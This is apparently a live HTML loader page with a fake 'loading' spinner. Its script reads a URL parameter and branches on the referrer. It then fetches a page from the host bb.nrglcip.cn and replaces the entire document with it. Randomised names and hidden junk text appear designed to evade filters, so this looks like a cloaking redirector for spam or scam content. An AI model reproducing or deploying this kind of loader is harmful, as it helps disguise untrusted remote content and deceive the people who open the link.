<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TEFcOp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TEFcOp .mupWKtyV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TEFcOp .content {
            line-height: 50px;
            text-align: center
        }

        .TEFcOp .img {
            width: 100%
        }

        .TEFcOp .syZ8KvbG {
            text-align: center
        }

        .TEFcOp .syZ8KvbG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TEFcOp .syZ8KvbG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TEFcOp .syZ8KvbG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TEFcOp .syZ8KvbG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TEFcOp .syZ8KvbG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TEFcOp .syZ8KvbG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TEFcOp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zYgGwgKxB0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aHDcX = zYgGwgKxB0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aHDcX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aHDcX +".html?a=share";
		}
		
        MlVdmLwIz=url+"#"+new Date().getTime();
        MlVdmLwIz && function() {
            $.get(MlVdmLwIz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>PvDSUvbG7VhOutgrglUsbQ8dD</span>
<li style='display:none' >sRooL61bY6L8rD</li>
<img  src='' style='display:none'>
<span style='display:none'>PvDSUvbG7VhOutgrglUsbQ8dD</span>
<b style='display:none' >bJx9vN6WLYUCoAj</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<li style='display:none' >sRooL61bY6L8rD</li>
<b style='display:none' >bJx9vN6WLYUCoAj</b>
<img  src='' style='display:none'><div class="TEFcOp">
    <div class="mupWKtyV">
        <div class="syZ8KvbG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >pxYRxfQ28k93zzKYpdjifblfNLaQXrhKpoIi1PSZLhbaJuXr287z1TxkI0MIJiWBI4wg42D0LKoOhXZ8UytyWY</b>
<a  href='#' style='display:none'>ft4czd0HrjkGEj1deQ2l7PS2syiaIICkFmJ9tt4aEluWxvYqb16in0jPNucj</a>
<li style='display:none' >ztyvPPKwEkQK2aUq7KfhwSklwgg012ixapULTgvImptJfeb</li>
<ul style='display:none' >VyWcMcbf5npb6855x4inyoBohQDMTvc1OBwnzurgaeky8uObdxbWYpkVVa9l4ZxU</ul>
<li style='display:none' >ztyvPPKwEkQK2aUq7KfhwSklwgg012ixapULTgvImptJfeb</li>
<span style='display:none'>RZTqOCyJ7nOenu3Zm3GRGUPCIRvMpGY97I</span></body>
</html>